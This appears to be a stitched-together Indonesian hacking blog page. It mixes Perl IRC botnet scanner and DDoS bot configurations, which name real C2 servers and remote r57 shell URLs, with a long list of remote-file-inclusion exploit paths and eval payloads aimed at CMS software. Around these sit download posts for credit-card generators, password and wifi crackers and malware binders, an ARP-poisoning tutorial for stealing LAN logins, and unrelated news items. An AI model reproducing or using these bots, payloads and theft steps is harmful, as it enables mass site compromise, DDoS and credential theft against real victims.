V6 Osirys

#!/usr/bin/perl

#####################################################################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

#######################################################
## CONFIGURATION //
#######################################################

$auth = "Osirys";
$authmail = "osirys\@live.it";
my $id = "http://ciro1992.org/ciao/id.txt??"; #Your RFI Response
my $shell = "http://evilc0der.com/r57.txt?"; #Shell printed on the Vulnerable Site
my $ircd = "irc.kill-9.server.or.id"; #Irc-Server
my $port = "6667"; #Irc-Server Port
my $chan1 = "#malang"; #Chan for Scan
my $chan2 = "#kill-9"; #Results will be printed here too
my $nick = "v6"; #Nick
my @admins = ("arianom");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;

### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )

my $spread = "";

my $spreadACT = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled
&cheek();
my $killpwd = "lol"; #Password to Kill the Bot
my $chidpwd = "lol"; #Password to change the RFI Response
my $cmdpwd = "lol"; #Password to execute commands on the server
my $secpwd = "lol"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "lol"; #Passowrd to enable/disable the Spread Mode

my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd != $cmdpwd;
my $badsecpwd != $secpwd;

#######################################################
## END OF CONFIGURATION //
#######################################################

$k= 0;
print q{
------------------------------------------------
__ ___
__ __/ / / __| __ __ _ _ _ _ _ ___ _ _
\ V / _ \ \__ \/ _/ _` | ' \| ' \/ -_) '_|
\_/\___/ |___/\__\__,_|_||_|_||_\___|_|

------------------------------------------------
[+] Coded by Osirys
[+] Contact: osirys[at]live[it]
[+] Keep it private !
[+] *New release, more fun ;)
[+] *Updated to: 18/06/2008

};


Download [lengkap + Id]

Windows Admin Password Hack 2010


Windows Admin Password Hack:
Forgot your NT admin password?
Reinstall? Oh no… But not any more…

This is a utility to (re)set the password of any user that has a valid (local) account on your NT system.
You do not need to know the old password to set a new one.
It works offline, that is, you have to shutdown your computer and boot off a floppydisk or CD. The bootdisk includes stuff to access NTFS and FAT/FAT32 partitions and scripts to glue the whole thing together.

Will detect and offer to unlock locked or disabled out user accounts!
It is also an almost fully functional registry editor!

Windows Admin Hack allows you to reset the administrator password on
Windows 2000/XP.

The ISO must be burned to a CD or Flash drive.

When it is booted, a mini version of linux starts which allows the
administrator password to be reset. useful if you need to work on a
machine the password is unknown.

Download:

1. Rapidshare
2. Password: www.dl4all.com

Garena Hack 5.7c


Released a new Garena Hack 5.7c.
Garena Hack 5.7c:
- Protection not see running hacks
- Hack is running version 1.23 & 1.24
- No message at the beginning where it is written that your ACC banned ..
- Gold 100 Exp 15 min Basic 50 exp even when you do not play
- No need to wait 5 seconds that would go into the room
- Flooding can be non-stop


Instructions for use:

1) Run the downloaded file in garena.exe folder and log in using your login Garen
2) In the folder with the downloaded Garena Haq Find the file Launch.bat through it we will run!
3) After clicking on Launch.bat blue window will appear where you must select the option for which version Var3 its run or even separately!
4) In this blue box, click 1 and enter, then we test fails, skip it and press any key)
5) Everything is ready:
Go through Launch.bat only the folder.

Download:
1. Uploading
2. Mirror

Hacking Wep Tutorials



I find out how hack wep , and now i write it in notepad and post it for you .
I download all tools for you , so you will have all what you need.
Some antivirus "aircrack-ng-1.0-win" see like virus , but its cracking tool.
I hope i help you guys .
It have only 12 steps and 2 tools what you need , for tutorials you will see "Wep Hack tutorials"
you can't miss it . Good luck and have fun

Download : (size :4408 KB)
1. Rapidshare
2. Password: www.dl4all.com

Bjork Scanner

!/usr/bin/perl
###############################################
# Im not living im just killing time
# radiohead ganja bjork the beatles
###############################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
##################################################
# Im not living im just killing time
# radiohead ganja bjork the beatles
##################################################
my @ps = ("/usr/sbin/ateam","/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[httpds]","/usr/sbin/httpd","[bash]");
$processo = $ps[rand scalar @ps];
my $linas_max='2';
my $sleep='3';
my $cmd="im.not.living.im.just.killing.time";
my $id="http://www.aigleboots.com//administrator/components/com_virtuemart/.../ID.txt?";
my $spread="http://www.aigleboots.com//administrator/components/com_virtuemart/.../sprd.txt?";
my $spreads="http://www.aigleboots.com//administrator/components/com_virtuemart/.../sprd.txt?";
my @adms=("arianom","kamtiez","!");
my @canais="#kill-9";
##################################################
# Im not living im just killing time
# radiohead ganja bjork the beatles
##################################################
my @nickname = ("killer");
my @rname = ("cailio");
my $nick = $nickname[rand scalar @nickname];
my $ircname = $nickname[rand scalar @nickname];
my $realname = $rname[rand scalar @rname];
$servidor='irc.kamtiez.punked.us' unless $servidor;
my $porta='7000';

etc..

Download Full Scanner

Hack Credit Cards



Generate valid Credit card numbers with their cvv numbers. Hack with their Valid Complete details and have some great fun.

Download:

1.Hotfile

Bugs Tested

.scan /components/com_joomlalib/standalone/stubjambo.php?baseDir= “/index.php?option=com_easybook”
.scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=50?
.scan /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “Diese Seite wurde mit der quelloffenen Software CMS Made Simple erstellt.”
.scan /members/?INC= “YourWebsitename gives you the best search results and keyword bidding.”
.scan /members/?INC= “If You lost password enter Your login:”
.scan2 ////////?cmd&file= “index.php?cmd=10?
.scan2 /include/admin.lib.inc.php?site_path= /list.php?bbs_id=
.scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= “option,com_joomlalib”
.scan2 /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath= “/plugins/mygallery/”
.scan2 /skins/advanced/advanced1.php?pluginpath[0]= “/advanced2.php”
.scan2 /admin/auth.php?xcart_dir= “/pages.php?pageid=3? -p 200
.scan2 /admin/auth.php?xcart_dir= “/admin/auth.php?xcart_dir=”
.scan2 /?sourcedir= “/QueryString.php”
.scan2 /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path= “/board.php?board=”
.scan2 ?sourcedir= index.php?sourcedir=
.scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= /index.php?option=com_gallery2
.scan2 /bemarket/postscript/postscript.php?p_mode= /bemarket/
.scan2 /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= /index.php?mact= -p 200
.scan2 /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= News,cntnt01,detail,0&cntnt01articleid= -p100
.scan2 /stats.php?dir[func]=&dir[base]= “mygamingladder” “my gaming ladder”
.scan2 /extras/poll/poll.php?file_newsportal= “/post.php?newsgroups=”
.scan2 /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= “com_sitemap”
.scan2 /autoclose.php?subd= “Help Desk Software By Kayako eSupport v3.10.02?
.scan2 /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= “/board.php?board=”
.scan2 /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= “/kboard.php?board=notice”
.scan2 /inc/shows.inc.php?cutepath= “Translated by Slaver”
.scan2 /themes/default/index.php?main= “cfagcms” “cfagcms”
.scan2 /themes/default/index.php?main= “cfag cms”
.scan2 /comments.php?id={${include($ddd)}}{${exit()}}&ddd= “poll_ssi.php”
.scan2 /poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= “/poll_cookie.php”
.scan2 /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “/index.php?option=com_content” xoo
.scan2 /admin.php?include_path= “Powered by Lazarus Guestbook from carbonize.co.uk”
.scan2 /classes/Import_MM.class.php?g_rb_basedir= “PHPRecipeBook”
.scan2 /?sIncPath= “Copyright © 2008 Your Company.”
.scan2 /?sIncPath= “/index.php?members_mode=”
.scan2 /?sIncPath= “/index.php?members_mode=top”
.scan2 /?sIncPath= “index.php?tags_mode=profile”
.scan2 /common/db.php?commonpath= “playing.php”
.scan2 /update/update2.php?lang= photokorn 1.53
.scan2 /index.php?view=page&pagename= “/?view=main&cityid=”
.scan2 /index.php?view=page&pagename= “You have an error in your SQL syntax;”
.scan2 /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3〈=en”
.scan2 /index.php?load= “/index.php?load=home”
.scan2 /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= “/index.php?module=Pagesetter”
.scan2 /index.php?view=page&pagename= “/?view=main&cityid=”
.scan2 /index.php?view=page&pagename= “You have an error in your SQL syntax;”
.scan2 /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3〈=en”
.scan2 /page.php?id= “RCMS-Pro”
.scan2 /page.php?id= “©2005 – 2006 Roosevelt Purification. RGameScript is a free software under GNU/GPL License”
.scan2 /page.php?id= “/index.php?id=cats”
.scan2 /function.inc.php?path= “ACGVclick” “ACGVclick”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx” “MODx”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx Parse Error”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=5?
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=1&start=10?
.scan2 /tools/send_reminders.php?noSet=0&includedir= “WebCalendar v1.1.0c-CVS”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “snippets/reflect”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx CMS”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “My MODx Site is powered by MODx Content Management System”
.scan2 /index.php?view=page&pagename= “Buy, sell, trade, date, events… post anything”
.scan2 /index.php?view=page&pagename= “Thank you for stopping by my site. Here you can leave your mark.”
.scan2 /includes/function_core.php?web_root= “Mp3 Rating”
.scan2 /?mosConfig_absolute_path= “Powered by Joomla!”
.scan2 /modules/Forums/admin/admin_words.php?phpbb_root_path= “Hebrew Ver. HebNukeR 2.0 © 2004 by HebNukeR.org. All Rights Reserved”
.scan2 /index.php?option=com_custompages&cpage= Joomla custompages
.scan2 /booth.php?include_path= “/poll_cookie.php”
.scan2 /update/update2.php?lang= “photo foto gallery bilder tauchen wracks galerie”
.scan2 /header.php?base_folder= “Powered by Bab.stats”
.scan2 /tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0RC3 (11 Mar 2005)
.scan2 /booth.php?include_path= “/poll_cookie.php”
.scan2 /index.php?cmd&file= “Membre avec photos seulement ?”
.scan2 /index.php?cmd&file= “%22HOME%22+%22%7C%22+%22UPLOAD+YOUR+PHOTO%22+%22%7C%22+%22LATEST+USERS%22+%22%7C%22+%22TOP+10%22+%22%7C%22+%22TOP+GUYS%22+%22%7C%22+%22TOP+GIRLS%22+%22%7C%22+%22CONTACT%22?
.scan2 /index.php?cmd&file= “List Users with Pics only?”
.scan2 /index.php?cmd&file= “So you think you’re HOT?”
.scan2 /contenido/external/frontend/news.php?cfg[path][includes]= Contenido Login
.scan2 /contenido/external/frontend/news.php?cfg[path][includes]= “Contenido Login” “Contenido Login”
.scan2 /clmcpreload.php?CLPATH= “CaLogic” “Calendars”
.scan2 /txt-db-api/txt-db-api.php?API_HOME_DIR= “linkmix” “linkmix” “linkmix”
.scan2 /cms/system/openengine.php?oe_classpath= “/cms/website.php?id=/de/”
.scan2 /modules/Forums/admin/admin_words.php?phpbb_root_path= “Thai Edition by ThaiNuke”
.scan2 index.php?custompluginfile[]= “Sorry, your account does not have access to submit information”
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /index.php?nwaction=shownews
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /article.php?article_file=
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= “Newswriter” “Newswriter”
.scan2 /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= “coppermine” “coppermine” “coppermine”
.scan2 /config.inc.php?path_escape= “Your Personal Search Advisor !”
.scan2 /include/scripts/export_batch.inc.php?DIR= “ModernBill”
.scan2 /config/config_admin.php?INC= “YourWebsitename gives you the best search results and keyword bidding.”
.scan2 /config/config_admin.php?INC= %22home%22+%22%7C%22+%22login%22+%22%7C%22+%22add+your+site%22+%22%7C%22+%22affiliate+program%22+%22%7C%22+%22privacy%22+%22%7C%22+%22terms%22
.scan2 /include/admin.lib.inc.php?site_path= /view.php?bbs_id=
.scan2 /clmcpreload.php?CLPATH= “© Philip Boone”
.scan components/com_virtuemart/install.php?mosConfig_absolute_path= “powered by VirtueMart”
.scan includes/archive/archive_topic.php?phpbb_root_path= IntegraMOD
.scan components/com_moofaq/includes/file_includer.php?gzip=0&file= "com_moofaq"
.scan /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path= /com_fabrik/
.scan /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path= /com_fabrik/
.scan /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir= snippetmaster
.scan2 ?dir[func]=&dir[base]= "Ladder Scripts"
.scan /accounts/inc/errors.php?error= "Powered By: Merak Mail Server Software"
.scan conf.php?subdir= "wow roster"
.scan /config/config_admin.php?INC= "Keyword" "Add Your Site"
.scan src/admin/pt_upload.php?config_file=[localserverfile]&ptconf[src]=
.scan ?INCLUDE_FOLDER= "e404.php"?*.st"
.scan /?_zb_path= "/bbs/" "/zboard/"
.scan //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= index.php
.scan source/mod/rss/viewitem.php?Codebase= ED Engine
.scan source/mod/rss/channeledit.php?Codebase= WebEd
.scan prepare.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
.scan /admin/frontpage_right.php?loadadminpage= Copyright � 2007 Agares Media
.scan /index.php?get= inurl”index.php?get=”
.scan /index.php?target= inurl”index.php?target=”

Cracker Indonesia Kembali Lumpuhkan Situs Malaysia

JAKARTA - Cracker Indonesia kembali beraksi di situs milik Malaysia. Kali ini yang menjadi korban serangan adalah situs Malaysia Natural Heritage.

Pantauan Okezone, Minggu (3/1/2010) di situs yang beralamat di http://malaysianaturalheritage.com/ tersebut menunjukkan tampilan situs tersebut telah diubah. Sebuah tulisan besar tampak jelas dalam gambar bendera Malaysia. Tulisan tersebut mengklaim bahwa situs tersebut milik Rakyat Indonesia.

"Situs ini diklaim oleh Rakyat Indonesia," demikian tulisan tersebut.

Selain itu, cracker yang menggunakan nama Arianom tersebut juga menuliskan sejumlah pesan-pesan yang menyudutkan Malaysia. seperti "Negara tak berbudaya, Suka Mencuri Kebudayaan Indonesia," tulisnya.

Aksi saling serang antara Indonesia dan Malaysia di dunia maya seolah tidak ada hentinya. Sebelumnya, pada September 2009 cracker Indonesia juga menyerang situs Malaysia.

Setidaknya sekira 50 situs Malaysia berhasil dikerjai cracker Indonesia, ketika itu. Selain mengibarkan bendera merah putih secara virtual, mereka juga menyematkan sebuah shoutbox yang memungkinkan para pengunjung situs-situs yang di-hack memberikan komentar. (ugo)

Source Code DDOS

#!/usr/bin/perl

use IO::Socket;
use IO::Select;
use Socket;
#####################
my $processo = '/usr/sbin/httpd';
my $linas_max='8';
my $sleep='0';
my $id="http://tdos.org/images/log.png??";
my @adms=("tukulesto","kaMtiEz");
#my @hostauth=("1980");
my @canais=("#indonesiancoder");
my $nick = "DDoSer";
my $ircname ='GodFather';
chop (my $realname = 'GF');
$servidor='xadmin.indonesiancoder.us' unless $servidor;
my $porta='7000';
#####################
# Eof Configuration #
#####################
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");

Download Free

140 Amazing Hacks For your PC


140 Amazing Hacks For your PC!(6MB)

Some of the hacks which this article contains are:
How to call your friends with their own number Extreme Hack
How to Hack a MySpace Account
how Web 2.0 Logos Are Drawn in Photoshop
Photoshop Tips and Tricks
Rapidshare Hack,No waiting for 15 mins
Shutdown Command Via Command Prompt
Talk 2Desktop
VODAFONE HACK FOR FREE GPRS!
Where The Saved Passwords Stores In Windows Xp & Vista - Must for hackers and Beginers
Windows Genuine Hack – 100 percent Works
Wireless Hacking
Call Anywhere in the World From PC to Mobile For Free 100% Working Hack Using Skype and Yahoo Messanger Full Tutorial
Chat with Friends through ms dos Command Prompt
Create Your Own Instant Messenger Bot'
Format A HDD With Notepad
Free Calling to Any US Phone From Your iPhone
Google Hacking
And several more...

Free Download:
1. Rapidshare
2. Password: www.dl4all.com

Ultra Hacker 155 in 1


155 Hack Tools All in One:
Anon FTP
BMP Ripper
CIA 10
FTP BR
Hack the game
Brutus
Genxe
AsPack 21
Hack flash template
Hydra
Hack My space
Blaster W32
and more...

Note: these are hack tools and may be detected as viruses/spyware by antivirus/spyware programs. Use at your own risk.


Free Download:

1. Rapidshare

Full Hack Pack 2009 [Exclusive]


New Hacking Tool-s 2009 for Georgia Hacking Community

Download
1. Hotfile

Wifi Hacks 2009 AIO


Wifi Hacks 2009 AIO | 128 MB

This tool has many different tools to hack and crack wifi so you can use your neighbours internet and do whatever. Tools for Windows and Linux also some nice extra tools!
* Aircrack
* Wireshark
* Ettercap
* Netstumbler
* Airsnare
* WIFIfofum
* Wdriver
* and much more...

Linux Hacks:
* Airpwn
* WEPcrack
* Prismstumbler
* WIFIscanner
* Airfart
* Magicmap
* WPA-cracker
* Wellenreiter
* and much more..

Free Download
1. Hotfile

Wireless Hack Toolz 2009


Wireless Hack Toolz 2009 AIO

1.NetStumbler-0.4.0
2.Kismet-2005-08-R
3.Wellenreiter-v1.9
4.WEP 0.1.0
5.Airsnort-0.2.7e
6.Wepwedgie-0.1.0-alpha
7.Hotspotter-0.4

Free Download:
1. Rapidshare

Dangerous Hack Tool 2010


The Most Dangerous Hack Tool 2010

Binders
- Daemon Crypt Public v2
- NT Packer v2.1
- EES binder v1.0
- File Injector v3
- Bytes Adder
- FreshBind v2.01
- YAB v2.01
- NakedBind v1.0
- Amok Joiner


Brute Forcers

- Munga Bunga ’s Official
- Brutus - Authentication Engine Test 2
- wwwHack v1.946
- FTP Brute Hacker
- FTP Brute Forcer.tar.gz - Unix
- Wbrute.tar.gz - Unix
- Shadow Scanner-Brute Forcer
- Hackers Utility v1.5
- POP3 brute forcer.tar.gz - Unix

CGI-Bug Scanners
- NStealth HTTP Security Scanner v5.8
- Attack Toolkit v4.1 & source code included
- Scanarator
- Legion NetBios Scanner v2.1
- NetView v1.0
- CGI Vulnerability Scan
- CGI Scanner v4.0
- VoidEye CGI scanner
and much more....

EXTRA!
- Telnet Tutorial

Download link:
1. Hotfile
2. Password: crazy-coderz.net

KingCripts Hacking Pack

AIO | KingCripts Hacking Pack (Legionares™) | 35.97 MB



Download Links: NO MIRROR PLEASE


1. Download Link: Depositfiles (US, DE, ES, UK, FR, RU, IT, CA, PT, NL, BE)
Download from DepositFiles

1. Download Link for other Countries:
Download it from HotFile

ESET Nod32 Keys Finder V7



What's New In V.7 :-
- NodLogin updated to version V10c
- TNod User & Password Finder updated to V1.3 (F!NAL)
- New Sites For Nod Keys added
- Portable Versions - Installation not needed!

Download:
1. Hotfile
2. Rapidshare

A.I.O USB Utilities Tools

A.I.O USB Utilities Tools 2010 V2 (Size: 38,2 MB)

All Software are latest versions
Flash Boot V1.4
USB Disk Security 5
USB Trace
Win SETUP From USB 1.1
Urescue
USB Firewall 1.1.3
USB Stick Locker
USB AntiVirus 2.3
USB Disk Eject

Download
1.Hotfile
2. Rapidshare

Hacking Tools - 85 in 1




Audio-theme: Sean Paul - Temperature

Main page:
- HOTMAIL HACKING
- YAHOO HACKING
- MSN FUN TOOLS
- FAKE SCREENS/PAGES
- OTHER HACKING TOOLS
- FUN TOOLS


Donwload Free:

1. USA, EU and Russia
Download here
2. Other countries:
Download here

Metasploit Framework

The Metasploit Project is ostensibly a group formed to "provide useful information to people who perform penetration testing, IDS signature development, and exploit research."

Their latest release, the Metasploit Framework version 2.0, claims to be "an advanced open-source platform for developing, testing, and using exploit code."

While it is true that the tools and functionality built in to the Metasploit Framework might prove valuable for a security auditor or penetration tester to use in verifying the security of a system or network, it is probably as true or more so that script-kiddies and other wannabe hackers or developers of malicious code might put this tool to use as an express lane or fast track to help them create exploits and malware.

I don't really know enough about the Metasploit Project or the developers who have worked on this utility to say whether their motives were pure. It seems that often the line between providing network security and breaking network security is a thin one and it doesn't take much for some otherwise rational people to accuse security researchers or administrators of less than honorable intentions. Some presume that anyone in network security is also a hacker on the side and many question the true intent of tools which double as powerful weapons for script-kiddies.

Even if we assume that their goal truly is to provide useful information and tools to help further the cause of development and security research, it doesn't change the fact that the tool is available for all to download and there is no way to predict or control what the end user will do with it.

The Metasploit Project says that their Metasploit Framework can be compared with expensive commercial products such as Immunity's CANVAS or Core Security Technology's Core Impact. These tools also provide the same or similar functionality. One of the main reasons that they have not come under the scrutiny that the Metasploit Framework has is the pricetag. Since few can afford these packages they pose little risk, but if you take that same power and distribute it freely there is a greater concern that the wrong people will use it for the wrong reasons.

The Metasploit Framework seems to be a powerful tool. I downloaded a copy myself to play with- on my own network against my lab computers. I think that for security administrators it may prove valuable in the battle to ensure your computer and network security and make sure you are protected. But, I think we may also start to see new exploits and malware hitting the streets once the script-kiddies start playing with this tool and learning just how powerful it can be as a weapon.

Download Free:
1. Metasploit For Windows
2. Metasploit For Linux

Network Spy 2.0

Network Spy is a general purpose diagnostic tool for administrators, programmers and students of network technologies. It can operate in different modes depending on the application. Some of the more typical applications of this tool include:

1. Packet capture and decode
2. Network Statistics gathering
3. Software debugging
4. Intrusion Detection and activity monitoring

Packet Capture and Decode
In this mode, Network Spy can be used to get a snapshot of data from an ethernet network. It is capable of decoding the most widely used IP protocols such as UCP, TCP and ICMP. It also allows you to save this data for later analysis. The decoded packets are displayed in human readable form.
Network Statistics gathering
In this mode, the amount of data attributed to a certain activity can be captured. For instance, if you want to monitor how much data is transferred between user x and excite.com, you can specify a rule to keep a track of amount of this data. Another example is keeping track of how much FTP data flows on your network.
Software Debugging
People programming network software and web applications will find this tool extremely useful. It can be used to debug application to find errors in code, compute bandwidth utilization and find bottlenecks.
Intrusion Detection and Activity Monitoring
Using the new rules-based filtering mechanism, one can capture packets of interest, avoiding a huge capture of all packets on the network. A rule specifies a pattern to match. For instance, one could specify to capture all ICMP packets where TTL=1. This would be true when someone is performing a traceroute. Similarly, you could specify a rule to capture all TCP packets where destination port is 23 and the SYN flag is true to find out how see how many telnet connections are being established.

Network Spy also includes various other tools such as DNS Lookup, Ping, TraceRoute and Whois to aid in everyday tasks.


Other Features

* No bloat software, small and fast executables.
* Easy installation (requires no reboot) and uninstall.
* Dynamically loaded drivers at runtime.
* Simple user-interface.
* View network traffic in realtime.
* Capture packets on a remote network.


System Requirements

* Windows 95/98/NT/2000/XP.
* An Ethernet Adapter (MS Dialup Adapters are not supported).


Download now!

You may download Network Spy and evaluate it. The evaluation version of Network Spy is restricted to 3 minutes of capture at a time.

Download : netspy.exe (545 KB)

"UU ITE Bermasalah di Penerapan"

VIVAnews- Ketua Mahkamah Konsitusi (MK) Mahfud MD menegaskan lembaga yang dia pimpin tidak mempunyai wewenang untuk menghapus Undang-Undang Informasi dan Transaksi Elektronik (ITE).

"Kalau mau menghapus undang-undang itu inisiatif politik," kata Mahfud, Selasa 22 Desember 2009. Dia menegaskan lembaga yang berwenang untuk menghapus undang-undang adalah lembaga legislatif bukan Mahkamah Konstitusi.

Hal ini menanggapi sejumlah persoalan hukum yang dikaitkan dengan UU ITE, diantaranya gugatan Rumah Sakit Omni International terhadap Prita Mulyasari dan gugatan pekerja infotainment melawan artis Luna Maya.

MK, kata dia, hanya berwenang bila undang-undang yang bersangkutan bertentangan dengan UUD 1945. "UU itu kan tidak bertentangan," tambahnya.

Demikian pula dengan persoalan boleh atau tidaknya suatu undang-undang berlaku. Mahfud mengatakan hal itu juga bukan porsi MK. "Itu legal policy dari pemerintah dan DPR," kata di kantornya.

Alternatif lainnya, sambungnya, Menteri Hukum dan HAM, Patrialis Akbar, bisa juga berinisiatif. "Membuat rancangan undang-undang untuk menggantikan itu," kata dia menjelaskan. "Itu kalau dia mau," sambung Mahfud.

Lebih lanjut Mahfud menjelaskan undang-undang yang digunakan untuk menjerat Prita Mulyasari itu pernah diuji materiilkan di Mahkamah Konsitusi. Permohonan ini ditolak karena argumentasi lahirnya UU ITE dinilai kuat dan konstitusional. "Kalau mau dihapus bisa, tapi bukan MK yang menyatakan," kata dia.

Menurut Mahfud, pasal pencemaran nama baik yang tercantum dalam UU ITE sudah benar. "Yang jadi masalah penerapannya," katanya. Sekarang ini, dia menilai hak warga harus dilindungi, termasuk dari pesan layanan singkat (SMS) liar. "Juga untuk menjaga agar orang tidak membuat sms liar," kata Mahfud memberi contoh.

Tifatul: UU ITE Miliki Beberapa Kejanggalan


VIVAnews - Pemerintah menyatakan Undang-Undang Informasi dan Transaksi Elektronik (UU ITE) bisa direvisi. Menteri Komunikasi dan Informatika, Tifatul Sembiring, mengatakan UU ITE memang memiliki beberapa kejanggalan.

Tifatul mengatakan akan mengumpulkan beberapa hal yang dalam UU ITE itu dianggap bermasalah. "Kita kumpulkan dulu tentang ini," katanya di kantor Menteri Koordinator Perekonomian, Jakarta, Rabu 23 Desember 2009.

Tifatul sendiri misalnya melihat tentang pasal masalah penghinaan hukuman yang ada seharusnya 6 bulan. Tapi dalam pasal dikenakan 6 tahun.

Sebelumnya Ketua Mahkamah Konsitusi (MK) Mahfud MD menegaskan lembaga yang dia pimpin tidak mempunyai wewenang untuk menghapus Undang-Undang Informasi dan Transaksi Elektronik (ITE).

"Kalau mau menghapus undang-undang itu inisiatif politik," kata Mahfud, Selasa 22 Desember 2009. Dia menegaskan lembaga yang berwenang untuk menghapus undang-undang adalah lembaga legislatif bukan Mahkamah Konstitusi.

Hal ini menanggapi sejumlah persoalan hukum yang dikaitkan dengan UU ITE, diantaranya gugatan Rumah Sakit Omni International terhadap Prita Mulyasari dan gugatan pekerja infotainment melawan artis Luna Maya.

Tutorial LAN Hacking (Newbie)

Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di world hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?
* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program,
bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah
lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Hacking ini menggunakan teknik:
* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.
Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:
* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya
terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:
* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan
termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:
* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:

Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di
jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:
http://www.wireshark.org/download.html
http://www.oxid.it/cain.html

Cara Menggunakan WireShark:
* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan,
bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama
anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada
komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik
“Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan
caranya karena saya tidak bisa :D)
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban
ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

